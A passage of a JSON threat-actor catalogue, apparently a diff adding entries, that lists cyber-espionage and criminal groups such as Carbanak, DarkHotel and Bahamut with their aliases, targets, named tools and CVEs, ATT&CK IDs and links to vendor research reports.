"names": [ + "SilverTerrier" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "DarkComet and NanoCore", + "Pony", + "Agent Tesla", + "KeyBase", + "ISpySoftware", + "ISR Stealer", + "Zeus and Atmos", + "Predator Pain", + "LokiBot", + "NetWire" + ], + "links": [ + "https://unit42.paloaltonetworks.com/silverterrier-covid-19-themed-business-email-compromise/", + "https://www.paloaltonetworks.com/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise.html" + ], + "attck_id": "G0083", + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "InvisiMole" + ], + "targets": [ + "Russia, Ukraine" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/", + "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "T-APT-04", + "Rattlesnake", + "SideWinder " + ], + "targets": [ + "Military, Govenment, Pakistan, \"South Asian countries\"" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/", + "http://www.deependresearch.org/2021/03/renewed-sidewinder-activity-in-south.html", + "https://www.anomali.com/blog/analyzing-digital-quartermasters-in-asia-do-chinese-and-indian-apts-have-a-shared-supply-chain", + "https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/ ", + "https://s.tencent.com/research/report/479.html", + "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c" + ], + "attck_id": null, + "comment": "Origins believed to be traced back to 2012" + }, + { + "country": "other", + "names": [ + "Topgear", + "Blackgear", + "Comnie" + ], + "targets": [ + "Japan, Taiwan, South Korea" + ], + "operations": [], + "description": null, + "tools": [ + "Protux", + "Eliriks" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/blackgear-cyberespionage-campaign-resurfaces-abuses-social-media-for-cc-communication/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/blackgear-espionage-campaign-evolves-adds-japan-target-list/" + ], + "attck_id": null, + "comment": "Dates back to 2008" + }, + { + "country": "other", + "names": [ + "Gorgon Group", + "Subaat", + "Aggah" + ], + "targets": [ + "Government organizations in the United Kingdom, Spain, Russia, the United States and MSMEs in India." + ], + "operations": [], + "description": null, + "tools": [ + "QuasarRAT", + "RevengeRat", + "NJRAT", + "NanoCoreRAT" + ], + "links": [ + "https://medium.com/@paul.k.burbage/aggah-not-exactly-apt-5e51aaff95f5", + "https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/", + "https://blog.prevailion.com/2019/10/mastermana-botnet.html", + "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", + "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://blog.yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/", + "https://www.anomali.com/blog/aggah-using-compromised-websites-to-target-businesses-across-asia-including-taiwan-manufacturing-industry", + "https://blog.360totalsecurity.com/en/gorgon-uses-covid-19-outbreak-to-launch-cyber-attacks-on-canada-and-other-regions/", + "https://blog.360totalsecurity.com/en/fishing-activities-in-kenya-and-india-by-suspected-gorgon-hacking-organization/", + "https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "SectorE02", + "Donot Team", + "APTC35", + "APT-C-35" + ], + "targets": [ + "Government officials, Pakistan, Kashmir" + ], + "operations": [ + "Lucky Elephant" + ], + "description": null, + "tools": [ + "yty", + "EHDevel" + ], + "links": [ + "https://www.reuters.com/article/us-india-cyber-threat/exclusive-india-and-pakistan-hit-by-spy-malware-cybersecurity-firm-idUSKCN1B80Y2", + "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", + "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html", + "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", + "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/", + "https://ti.360.net/blog/articles/pakistan-targeted-apt-campaign/", + "http://blog.ptsecurity.com/2019/11/studying-donot-team.html", + "https://ti.360.net/blog/articles/donot-group-is-targeting-pakistani-businessman-working-in-china/", + "https://asert.arbornetworks.com/donot-team-leverages-new-modular-malware-framework-south-asia/", + "https://www.netscout.com/blog/asert/lucky-elephant-campaign-masquerading", + "https://github.com/aptnotes/data/files/679036/Snake.In.The.Grass.-.Python-based.Malware.Used.For.Targeted.Attacks.-.BLUE.COAT.LABS.pdf", + "https://labs.bitdefender.com/wp-content/uploads/downloads/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/", + "https://www.amnesty.org/en/wp-content/uploads/2021/10/AFR5747562021ENGLISH.pdf", + "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/" + ], + "attck_id": null, + "comment": "Possible links to Hangover" + }, + { + "country": "other", + "names": [ + "DustSquad", + "Nomadic Octopus" + ], + "targets": [ + "Central Asian users and diplomatic entities" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" + ], + "attck_id": null, + "comment": "Russian-speaking" + }, + { + "country": "other", + "names": [ + "Carbanak", + "Anunak", + "Carbon Spider", + "Carbanak Group" + ], + "targets": [ + "Banks of Russia and payment system" + ], + "operations": [ + "Odinaff" + ], + "description": null, + "tools": [ + "Mimikatz", + "MBR Eraser", + "PsExec", + "Bateleur", + "SSHd with BackDoor", + "Sekur", + "Bateleur JScript Backdoor", + "Agent ORM", + "SoftPerfect Network Scanner", + "VB Flash", + "JS FLash", + "Ammy Admin", + "CVE-2012-2539 and CVE-2012-0158", + "Backdoor Batel", + "Cobalt Strike", + "Netscan" + ], + "links": [ + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/", + "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf", + "http://2014.zeronights.ru/assets/files/slides/ivanovb-zeronights.pdf" + ], + "attck_id": "G0008", + "comment": "Overlaps with FIN7" + }, + { + "country": "other", + "names": [ + "Indrik Spider", + "TA505 (merged w/Indrik Spider)", + "Evil Corp" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "WastedLocker" + ], + "links": [ + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://blog.fox-it.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/" + ], + "attck_id": "G0092", + "comment": null + }, + { + "country": "other", + "names": [ + "TA544" + ], + "targets": [ + "Online banking, Italy, Poland, Germany, Spain, Japan" + ], + "operations": [], + "description": null, + "tools": [ + "Panda Banker", + "Nymaim", + "Ursnif", + "Chthonic", + "Smoke Loader", + "URLZone" + ], + "links": [ + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Shathak", + "TA551" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Valak", + "IcedID" + ], + "links": [ + "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", + "https://www.proofpoint.com/us/blog/security-briefs/ta551-uses-sliver-red-team-tool-new-activity", + "https://redcanary.com/threat-detection-report/threats/ta551/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "TA555" + ], + "targets": [ + "hotel employees, restaurant workers, recruiters for telecom" + ], + "operations": [], + "description": null, + "tools": [ + "", + "AdvisorsBot", + "PoshAdvisor" + ], + "links": [ + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "APT-C-36", + "Blind Eagle" + ], + "targets": [ + "Colombian government institutions" + ], + "operations": [], + "description": null, + "tools": [ + "Imminent RAT" + ], + "links": [ + "https://lab52.io/blog/apt-c-36-new-anti-detection-tricks/", + "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "https://redskyalliance.org/xindustry/apt-c-36-blind-eagle-and-colombia" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "APT-C-08", + "Manling Flower (Manlinghua)", + "Bitter" + ], + "targets": [ + "Pakistan, Saudi Arabia, PRC" + ], + "operations": [], + "description": null, + "tools": [ + "BitterRAT", + "ArtraDownloader", + "SlideRAT" + ], + "links": [ + "https://meltx0r.github.io/tech/2019/09/09/bitter-apt-not-so-sweet-pt2.html", + "https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/", + "https://www.forbes.com/sites/thomasbrewster/2021/09/17/exodus-american-tech-helped-india-spy-on-china/", + "https://cert.360.cn/report/detail?id=137867e159331b7a968aa45050502d13", + "https://meltx0r.github.io/tech/2019/09/06/bitter-apt-not-so-sweet.html", + "https://labs.bitdefender.com/2020/06/bitterapt-revisited-the-untold-evolution-of-an-android-espionage-tool/", + "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/", + "http://blogs.360.cn/post/analysis_of_APT_C_08.html", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", + "https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations#When:19:24:00Z" + ], + "attck_id": null, + "comment": "ArtraDownloader: earliest timestamp Feb 2015" + }, + { + "country": "other", + "names": [ + "WINDSHIFT", + "Bahamut", + "EHDEVEL", + "URPAGE", + "The White Company" + ], + "targets": [ + "Middle Eastern human rights activists" + ], + "operations": [ + "InPage zero-day", + "Malicious MDM" + ], + "description": null, + "tools": [], + "links": [ + "https://blog.cyble.com/2021/08/10/bahamut-threat-group-targeting-users-through-phishing-campaign/", + "https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM-Part2.html", + "https://blogs.blackberry.com/en/2020/10/blackberry-uncovers-massive-hack-for-hire-group-targeting-governments-businesses-human-rights-groups-and-influential-individuals", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/", + "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + "https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html", + "https://www.anomali.com/blog/bahamut-possibly-responsible-for-multi-stage-infection-chain-campaign", + "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" + ], + "attck_id": "G0112", + "comment": "Possibly linked to WindShift, Patchwork, Dropping Elephant, possibly commercial/mercenary" + }, + { + "country": "other", + "names": [ + "WindShift" + ], + "targets": [ + "Gulf Cooperation Council" + ], + "operations": [], + "description": null, + "tools": [ + "WindTape", + "WindTail" + ], + "links": [ + "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf", + "https://objective-see.com/blog/blog_0x38.html", + "https://digitasecurity.com/blog/2018/12/20/windtail/", + "https://unit42.paloaltonetworks.com/shifting-in-the-wind-windshift-attacks-target-middle-eastern-governments/" + ], + "attck_id": "G0112", + "comment": "Possibly linked to Bahamut, Patchwork, Dropping Elephant" + }, + { + "country": "other", + "names": [ + "EmpireMonkey", + "CobaltGoblin" + ], + "targets": [], + "operations": [ + "Bank of Valletta" + ], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "https://www.timesofmalta.com/articles/view/20190225/local/how-bov-hackers-got-away-with-13-million.702800", + "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems" + ], + "attck_id": null, + "comment": "Criminal, overlap with FIN7 & Carbanak" + }, + { + "country": "other", + "names": [ + "Pacha Group" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.intezer.com/blog-pacha-group-deploying-undetected-cryptojacking-campaigns/", + "https://www.intezer.com/blog-technical-analysis-pacha-group/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "DNSpionage" + ], + "targets": [ + "Lebanon, UAE" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog-cert.opmd.fr/dnspionage-retour-factuel-sur-les-attaques-annoncees-dans-differents-medias/", + "https://blog-cert.opmd.fr/dnspionage-weird-apt32-stuff/", + "https://twitter.com/_CPResearch_/status/1103525899515973632", + "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html", + "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "DeadlyKiss", + "PLATINUM", + "TwoForOne" + ], + "targets": [ + "primarily targets governmental organizations, defense institutes, intelligence agencies, and telecommunication providers in South and Southeast Asia" + ], + "operations": [ + "Hellsing" + ], + "description": null, + "tools": [ + "Hotpatching techniques", + "AMT Feature FW evasion", + "CVE-2015-2545" + ], + "links": [ + "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf", + "https://blog.telsy.com/deadlykiss-malware/", + "https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/", + "https://www.microsoft.com/security/blog/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/?source=mmpc", + "http://arstechnica.com/security/2015/04/elite-cyber-crime-group-strikes-back-after-attack-by-rival-apt-gang/", + "https://threatpost.com/platinum-apt-first-to-abuse-intel-chip-management-feature/126166/", + "https://securelist.com/titanium-the-platinum-group-strikes-again/", + "https://securelist.com/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/", + "https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/" + ], + "attck_id": "G0068", + "comment": null + }, + { + "country": "other", + "names": [ + "GreyEnergy Group" + ], + "targets": [ + "Industries: Energy (in Ukraine & Eastern Europe)" + ], + "operations": [], + "description": null, + "tools": [ + "GreyEnergy Dropper", + "Maldoc", + "GreyEnergy Min/FELIXROOT" + ], + "links": [ + "https://github.com/NozomiNetworks/greyenergy-unpacker", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", + "https://www.nozominetworks.com/resources/research-paper/greyenergy-dissecting-the-malware-from-maldoc-to-backdoor-2/", + "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "TA516", + "SmokingDro" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Remocs" + ], + "links": [], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Captain Cha", + "TA564" + ], + "targets": [ + "Delivered Nymaim to Poland and Danabot to Canada" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www2.gov.bc.ca/assets/gov/british-columbians-our-governments/services-policies-for-government/information-management-technology/information-security/global_threat_landscape_-_bc_security_day.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "TA543", + "Sagrid" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www2.gov.bc.ca/assets/gov/british-columbians-our-governments/services-policies-for-government/information-management-technology/information-security/global_threat_landscape_-_bc_security_day.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "TA545", + "AirCanada" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www2.gov.bc.ca/assets/gov/british-columbians-our-governments/services-policies-for-government/information-management-technology/information-security/global_threat_landscape_-_bc_security_day.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "TA2101" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Maze ransomware" + ], + "links": [ + "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us", + "https://www.cyfirma.com/maze-ransomware-group-declared-successful-exploits-of-many-organizations-and-released-massive-data-on-public-site-in-one-day/", + "https://securityintelligence.com/news/ta2101-threat-actor-targeted-german-italian-and-us-organizations-with-maze-ransomware/" + ], + "attck_id": null, + "comment": "Criminal, Cyfirma asserts link to APT29" + }, + { + "country": "other", + "names": [ + "Evilnum", + "Decepticons" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.brighttalk.com/webcast/15591/424426/new-threats-in-a-changing-world-apt-trends-in-q2-2020", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://www.rewterz.com/rewterz-news/rewterz-threat-alert-evilnum-apt-group-targeting-financial-sector-2", + "https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Golden Chickens" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://quointelligence.eu/2018/11/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using/", + "https://quointelligence.eu/2020/01/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors/" + ], + "attck_id": null, + "comment": "Malware-as-a-service" + }, + { + "country": "other", + "names": [ + "IamtheKing", + "Powerpool" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "SLOTHFULMEDIA" + ], + "links": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a", + "https://twitter.com/craiu/status/1311920398259367942" + ], + "attck_id": null, + "comment": "active since 2017" + }, + { + "country": "other", + "names": [ + "UNC1945", + "LightBasin" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Pupyrat", + "Oksolo", + "QEMU", + "PingPong", + "Slapstick", + "Steelcorgi", + "Evilsun", + "Tinyshell", + "Logbleach", + "Openshackle", + "Lemonstick" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html", + "https://www.crowdstrike.com/blog/an-analysis-of-lightbasin-telecommunications-attacks/", + "https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html", + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "APT-C-44", + "Fox Group" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blogs.360.cn/post/APT-C-44.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Luder", + "Karba", + "Tapaoux", + "DarkHotel", + "Nemim", + "APT-C-06, SHADOW CRANE, T-APT-02, SIG25 (NSA),", + "Tardigrade Spider", + "Dubnium (Microsoft)" + ], + "targets": [ + "Japan, Taiwan, China, Russia, South Korea, North Korea Government, Utilities, High-Tech, Automotive" + ], + "operations": [ + "Daybreak?", + "WizardOpium", + "Fallout Team" + ], + "description": null, + "tools": [ + "Higaisa", + "Win32.Pioneer", + "CVE-2012-0158", + "CVE-2010-2883", + "Asruex", + "CVE-2015-8651", + "CVE-2016-4171 and CVE-2018-817", + "Win32.Karba", + "Inexsmar" + ], + "links": [ + "https://translate.google.com/translate?hl=&sl=zh-CN&tl=en&u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%2FW87E6_v9YCnsmQWDd7NOHw&sandbox=1", + "http://www.wired.com/2014/11/darkhotel-malware/", + "https://www.zscaler.com/blogs/research/return-higaisa-apt", + "https://github.com/aptnotes/data/issues/56", + "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html", + "https://securelist.com/operation-daybreak/75100/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/", + "https://s.tencent.com/research/report/836.html", + "https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/", + "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/", + "https://www.cfr.org/blog/questioning-chinas-politicization-cyber-intelligence-during-pandemic", + "https://blogs.jpcert.or.jp/en/2016/06/asruex-malware-infecting-through-shortcut-files.html", + "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html", + "http://drops.wooyun.org/tips/11726", + "https://securelist.com/blog/research/66779/the-darkhotel-apt/", + "https://s.tencent.com/research/report/1000.html", + "https://research.checkpoint.com/silivaccine-a-look-inside-north-koreas-anti-virus/", + "https://www.anomali.com/blog/covid-19-themes-are-being-utilized-by-threat-actors-of-varying-sophistication", + "https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/" + ], + "attck_id": "G0012", + "comment": null + }, + { + "country": "other", + "names": [ + "Ghostwriter", + "UNC1151" + ], + "targets": [], + "operations": [ + "Operation Ghostwriter" + ], + "description": null, + "tools": [], + "links": [ + "https://www.prevailion.com/diving-deep-into-unc1151s-infrastructure-ghostwriter-and-beyond/", + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/unc1151-ghostwriter-update-report.pdf", + "https://cert.gov.ua/article/37626", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0318.pdf", + "https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/", + "https://www.mandiant.com/resources/unc1151-linked-to-belarus-government" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Crouching Yeti" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/blog/research/65240/energetic-bear-more-like-a-crouching-yeti/" + ], + "attck_id": null, + "comment": "Links to Energetic Bear" + }, + { + "country": "unknown", + "names": [ + "NewRomanic Cyber Army Team " + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Whois Wiper" + ], + "links": [ + "http://www.mcafee.com/us/resources/white-papers/wp-dissecting-operation-troy.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "The Whois Hacking Team" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.mcafee.com/us/resources/white-papers/wp-dissecting-operation-troy.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "ItaDuke" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Roaming Tiger" + ], + "targets": [ + "Gov, Oil and Gas, Aerospace, Defense in UZ, MN, MY, RU, BY, KZ, US, Tibet, UA" + ], + "operations": [ + "TOPNEWS", + "Roaming Tiger" + ], + "description": null, + "tools": [ + "SOGU", + "FIRSTBLOOD", + "PI", + "GHOST", + "TEMPFUN" + ], + "links": [ + "http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/", + "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Emdivi", + "Cloudy Omega", + "Blue Termite" + ], + "targets": [ + "This threat actor is believed to have been responsible for the Japan Pension Service incident. It is also known as Emdivi\u00c2\u00a0and Cloudy Omega." + ], + "operations": [ + "Blue Termite" + ], + "description": null, + "tools": [ + "Emdivi" + ], + "links": [ + "http://www.kaspersky.com/about/news/virus/2015/Blue-Termite-A-Sophisticated-Cyber-Espionage-Campaign-is-After-High-Profile-Japanese-Targets", + "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/", + "http://www.symantec.com/connect/blogs/operation-cloudyomega-ichitaro-zero-day-and-ongoing-cyberespionage-campaign-targeting-japan", + "https://web.archive.org/web/20160303010953/http://www.kaspersky.com/about/news/virus/2015/Blue-Termite-A-Sophisticated-Cyber-Espionage-Campaign-is-After-High-Profile-Japanese-Targets" + ], + "attck_id": null, + "comment": "Possible link to APT10" + }, + { + "country": "unknown", + "names": [ + "Suckfly" + ], + "targets": [ + "South Korea, India" + ], + "operations": [], + "description": null, + "tools": [ + "tcpscan", + "wce", + "credentialdumper", + "gsecdump", + "smbscan" + ], + "links": [ + "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates", + "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks" + ], + "attck_id": null, + "comment": "Alleged to be China based" + }, + { + "country": "unknown", + "names": [ + "?" + ], + "targets": [], + "operations": [ + "Groundbait" + ], + "description": null, + "tools": [ + "Win32/Prikormka" + ], + "links": [ + "http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "SPIVY" + ], + "targets": [ + "Organisations in Hong Kong" + ], + "operations": [], + "description": null, + "tools": [ + "PoisonIvy", + "CVE-2015-2545" + ], + "links": [ + "http://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "EvilPost" + ], + "targets": [ + "Japanese Defence Sector" + ], + "operations": [], + "description": null, + "tools": [ + "CVE-2015-2545 " + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + ], + "attck_id": null, + "comment": "C2 Server in Japan" + }, + { + "country": "unknown", + "names": [ + "Danti" + ], + "targets": [ + "Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines" + ], + "operations": [], + "description": null, + "tools": [ + "CVE-2015-2545 " + ], + "links": [ + "https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/" + ], + "attck_id": null, + "comment": "probably related to NetTraveller and DragonOK" + }, + { + "country": "unknown", + "names": [ + "?" + ], + "targets": [ + "Industrial Control Systems (ICS)" + ], + "operations": [ + "IronGate" + ], + "description": null, + "tools": [], + "links": [ + "https://www.fireeye.com/blog/threat-research/2016/06/irongate_ics_malware.html" + ], + "attck_id": null, + "comment": "MitM, Sandbox Evasion" + }, + { + "country": "unknown", + "names": [ + "Evanescent Bat" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [], + "attck_id": null, + "comment": "Tracked by Crowdstrike" + }, + { + "country": "unknown", + "names": [ + "NewsBeef" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Poseidon" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Ghoul" + ], + "targets": [ + "mainly industrial, engineering and manufacturing organizations in more than 30 countries" + ], + "operations": [ + "Operation Ghoul" + ], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" + ], + "attck_id": null, + "comment": "Financial interests" + }, + { + "country": "unknown", + "names": [ + "FruityArmor" + ], + "targets": [ + "Middle Eastern region" + ], + "operations": [], + "description": null, + "tools": [ + "PowerShell backdoor", + "CVE-2018-8611", + "0day CVE-2018-8453", + "MS16-120 / CVE-2016-3393 0day exploits" + ], + "links": [ + "https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/", + "https://securelist.com/blog/research/76396/windows-zero-day-exploit-used-in-targeted-attacks-by-fruityarmor-apt/", + "https://securelist.com/zero-day-in-windows-kernel-transaction-manager-cve-2018-8611/89253/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Snake Wine" + ], + "targets": [ + "Japanese Targets" + ], + "operations": [], + "description": null, + "tools": [ + "Ham Backdoor", + "Tofu Backdoor" + ], + "links": [ + "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html" + ], + "attck_id": null, + "comment": "Tracked by Cylance" + }, + { + "country": "unknown", + "names": [ + "Manganese", + "APT5" + ], + "targets": [ + "Telecommunications and technology companies, particularly in 